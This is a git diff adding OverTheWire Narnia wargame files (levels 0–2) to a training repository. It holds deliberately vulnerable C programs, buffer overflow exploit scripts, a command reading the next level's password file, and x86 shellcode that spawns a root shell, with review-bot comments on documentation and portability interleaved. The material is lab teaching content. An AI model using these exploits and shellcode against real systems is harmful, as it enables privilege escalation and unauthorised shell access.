diff --git a/presentations/4. OTW Narnia/OTW_Narnia.odp b/presentations/4. OTW Narnia/OTW_Narnia.odp
new file mode 100644
index 0000000..18361ba
Binary files /dev/null and b/presentations/4. OTW Narnia/OTW_Narnia.odp differ
diff --git a/presentations/4. OTW Narnia/OTW_Narnia.pdf b/presentations/4. OTW Narnia/OTW_Narnia.pdf
new file mode 100644
index 0000000..613e8a0
Binary files /dev/null and b/presentations/4. OTW Narnia/OTW_Narnia.pdf differ
diff --git a/tasks/pwn/narnia/narnia0/narnia0.c b/tasks/pwn/narnia/narnia0/narnia0.c
new file mode 100644
index 0000000..f7aeb79
--- /dev/null
+++ b/tasks/pwn/narnia/narnia0/narnia0.c
@@ -0,0 +1,40 @@
+/*
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program; if not, write to the Free Software
+ Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+ */
+#include
+#include
+
+int main(){
+ long val=0x41414141;
+ char buf[20];
+
+ printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
+ printf("Here is your chance: ");
+ scanf("%24s",&buf);
+
+ printf("buf: %s\n",buf);
+ printf("val: 0x%08x\n",val);
+
+ if(val==0xdeadbeef){
+ setreuid(geteuid(),geteuid());
+ system("/bin/sh");
+ }
+ else {
+ printf("WAY OFF!!!!\n");
+ exit(1);
+ }
+
+ return 0;
+}
diff --git a/tasks/pwn/narnia/narnia0/narnia0_exploit.py b/tasks/pwn/narnia/narnia0/narnia0_exploit.py
new file mode 100644
index 0000000..92f7c52
--- /dev/null
+++ b/tasks/pwn/narnia/narnia0/narnia0_exploit.py
@@ -0,0 +1,13 @@
+#!/bin/python3
+import time
+import sys
+
+# exploit buffer overflow
+sys.stdout.buffer.write(b"\x90" * 20 + b"\xef\xbe\xad\xde")
+
+# sync script stdout to narnia0 stdin and wait some time
+sys.stdout.flush()
+time.sleep(1)
+
+# command to get our next password
+sys.stdout.buffer.write(b"cat /etc/narnia_pass/narnia1")
diff --git a/tasks/pwn/narnia/narnia1/export_egg.py b/tasks/pwn/narnia/narnia1/export_egg.py
new file mode 100644
index 0000000..2e8c80d
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/export_egg.py
@@ -0,0 +1,3 @@
+#!/bin/python3
+import sys
+sys.stdout.buffer.write(b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")
diff --git a/tasks/pwn/narnia/narnia1/narnia1.c b/tasks/pwn/narnia/narnia1/narnia1.c
new file mode 100644
index 0000000..863f5cb
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/narnia1.c
@@ -0,0 +1,31 @@
+/*
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program; if not, write to the Free Software
+ Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+ */
+#include
+
+int main(){
+ int (*ret)();
+
+ if(getenv("EGG")==NULL){
+ printf("Give me something to execute at the env-variable EGG\n");
+ exit(1);
+ }
+
+ printf("Trying to execute EGG!\n");
+ ret = getenv("EGG");
+ ret();
+
+ return 0;
+}
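Review bot: The payload literal on the first `write` line carries no explanation of its two magic values, so a reader has to reverse it against narnia0.c; a comment such as `# 20 filler bytes match char buf[20] in narnia0.c; the trailing 4 bytes are 0xdeadbeef in little-endian order` would keep the script self-describing. The `time.sleep(1)` is a fixed delay standing in for real synchronisation, and the comment above it should state that assumption rather than just "wait some time". The shebang `#!/bin/python3` hard-codes an interpreter path that does not exist on many systems; `#!/usr/bin/env python3` is the portable form, and the same applies to narnia1/export_egg.py and narnia2/shellcode.py in this commit.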
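Review bot: The 34-byte literal on the `write` line is undocumented and is duplicated verbatim in `narnia1/shellcode` and `narnia2/shellcode.py`, while the annotated listing in `narnia1/shellcode.c` describes a different, 33-byte sequence (its header says `- 33 bytes`), so the only commented version in the repo does not explain the bytes the scripts actually emit. Keep one annotated source of truth and have the scripts reference it, or at minimum add a comment above the literal giving its origin and the fact that it differs from shellcode.c. The notes file also exports the bytes under `SHELLCODE`, whereas narnia1.c reads `getenv("EGG")`; the variable name in the notes is worth reconciling with the source.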
diff --git a/tasks/pwn/narnia/narnia1/shellcode b/tasks/pwn/narnia/narnia1/shellcode
new file mode 100644
index 0000000..763878a
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/shellcode
@@ -0,0 +1,5 @@
+\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80
+
+len: 34
+
+export SHELLCODE=$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")')
diff --git a/tasks/pwn/narnia/narnia1/shellcode.c b/tasks/pwn/narnia/narnia1/shellcode.c
new file mode 100644
index 0000000..d3b7084
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/shellcode.c
@@ -0,0 +1,36 @@
+/*
+ * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
+ * - 33 bytes
+ * - xgc@gotfault.net
+ *
+ */
+
+char shellcode[] =
+ // setreuid(0, 0)
+ "\x6a\x46" // push $0x46
+ "\x58" // pop %eax
+ "\x31\xdb" // xor %ebx, %ebx
+ "\x31\xc9" // xor %ecx, %ecx
+ "\xcd\x80" // int $0x80
+
+ // execve("/bin/sh")
+ "\x31\xd2" // xor %edx, %edx
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68"// push $0x68732f2f
+ // [h, s, /, /]
+ "\x68\x2f\x62\x69\x6e"// push $0x6e69622f
+ // [n, i, b, /]
+ "\x89\xe3" // mov %esp, %ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp, %ecx
+ "\xcd\x80"; // int $0x80
+
+int main() {
+
+ int (*f)() = (int(*)())shellcode;
+ printf("Length: %u\n", strlen(shellcode));
+ f();
+}
diff --git a/tasks/pwn/narnia/narnia2/esp.c b/tasks/pwn/narnia/narnia2/esp.c
new file mode 100644
index 0000000..7a46285
--- /dev/null
+++ b/tasks/pwn/narnia/narnia2/esp.c
@@ -0,0 +1,6 @@
+#include
+#include
+void main(int argc, char *argv[]) {
+ register int i asm("esp");
+ printf("$esp = %#010x\n", i);
+}
diff --git a/tasks/pwn/narnia/narnia2/narnia2.c b/tasks/pwn/narnia/narnia2/narnia2.c
new file mode 100644
index 0000000..45ab0f6
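Review bot: `printf` and `strlen` in `main` are called with no `#include` anywhere in shellcode.c, unlike the other C files in this commit; that is an implicit function declaration, which C99 removed and recent GCC releases reject by default, so add `#include <stdio.h>` and `#include <string.h>` at the top. `strlen(shellcode)` returns `size_t` but is printed with `%u`; `%zu` is the matching conversion. A one-line comment above `char shellcode[]` noting that this 33-byte listing is not the 34-byte sequence emitted by the Python scripts in the same commit would stop the two from being confused.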
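Review bot: `void main(int argc, char *argv[])` is not a conforming signature and neither parameter is used; make it `int main(void)` and end the body with `return 0;`. The `register int i asm("esp")` binding is a GCC extension naming the 32-bit stack-pointer register, so the file only makes sense as an i386 build; a comment stating that constraint would save the next reader a compile-time surprise.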
--- /dev/null
+++ b/tasks/pwn/narnia/narnia2/narnia2.c
@@ -0,0 +1,33 @@
+/*
+ This program is free software; you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation; either version 2 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program; if not, write to the Free Software
+ Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
+*/
+
+#include
+#include
+#include
+
+int main(int argc, char * argv[]){
+ char buf[128];
+
+ if(argc == 1){
+ printf("Usage: %s argument\n", argv[0]);
+ exit(1);
+ }
+ strcpy(buf,argv[1]);
+ printf("%s", buf);
+
+ return 0;
+}
+
diff --git a/tasks/pwn/narnia/narnia2/shellcode.py b/tasks/pwn/narnia/narnia2/shellcode.py
new file mode 100644
index 0000000..4ecbb53
--- /dev/null
+++ b/tasks/pwn/narnia/narnia2/shellcode.py
@@ -0,0 +1,9 @@
+#!/bin/python3
+import sys
+shellcode=b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
+# -112 for real world
+# address=b"\x18\xd4\xff\xff"
+address=b"\xa8\xd3\xff\xff"
+
+sys.stdout.buffer.write(shellcode)
+sys.stdout.buffer.write((132-len(shellcode)) * b"\x90" + address)
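Review bot: The constants on the last line are undocumented: `132` and the two hard-coded `address` values are environment-specific, and `# -112 for real world` does not say which value is being adjusted or relative to what, so the script cannot be reproduced from its own comments. State in a comment how `132` relates to narnia2.c and under what conditions each `address` value was observed. `(132-len(shellcode))` also goes negative silently if the literal ever grows past 132 bytes, yielding `b""` instead of padding; a guard such as `if len(shellcode) > 132:` / `    sys.exit("shellcode too long for the 132-byte payload")` makes that failure visible.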